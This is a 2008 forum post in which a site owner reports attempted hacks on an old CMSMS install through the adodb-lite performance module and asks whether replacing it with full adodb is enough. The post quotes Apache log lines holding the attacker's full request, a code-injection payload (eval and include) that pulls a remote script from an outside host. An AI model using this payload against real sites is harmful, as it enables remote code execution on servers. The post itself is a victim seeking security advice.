attacked by adodb-lite exploit
Posted: Tue Sep 23, 2008 4:55 pm
Hi people
I had a warning from the hosting company about some people attempting to hack my (old versionĀ
) CMSMS... Because of the delay before the apache log is available, I had no hint, so I settled to upgrading to v1.4.1. The day after, I had another warning, and also access to the (first attack) log, so I could see the problem :
I then proceeded to replace adodb-lite with the full adodb and setting $config['use_adodb_lite'] to false...
No attack so far
Is it a known problem ? Am I secure enough after replacing adodb-lite ? should everybody stop using adodb-lite ?
Thanks
7BZH
I had a warning from the hosting company about some people attempting to hack my (old versionĀ
) CMSMS... Because of the delay before the apache log is available, I had no hint, so I settled to upgrading to v1.4.1. The day after, I had another warning, and also access to the (first attack) log, so I could see the problem :Code: Select all
web.a-servis.cz www.7bzh.com - [21/Sep/2008:11:09:16 +0200] "GET /lib/adodb_lite/adodb-perf-module.inc.php?
last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);
&a=http://www.mta.cl/guestbook.txt???? HTTP/1.1" 200 61 "-" "libwww-perl/5.65"
web.a-servis.cz www.7bzh.com - [21/Sep/2008:11:09:19 +0200] "GET /lib/adodb_lite/adodb-perf-module.inc.php?
last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);
&a=http://www.mta.cl/no/modules/readme.txt??? HTTP/1.1" 500 543 "-" "libwww-perl/5.65"No attack so far
Is it a known problem ? Am I secure enough after replacing adodb-lite ? should everybody stop using adodb-lite ?
Thanks
7BZH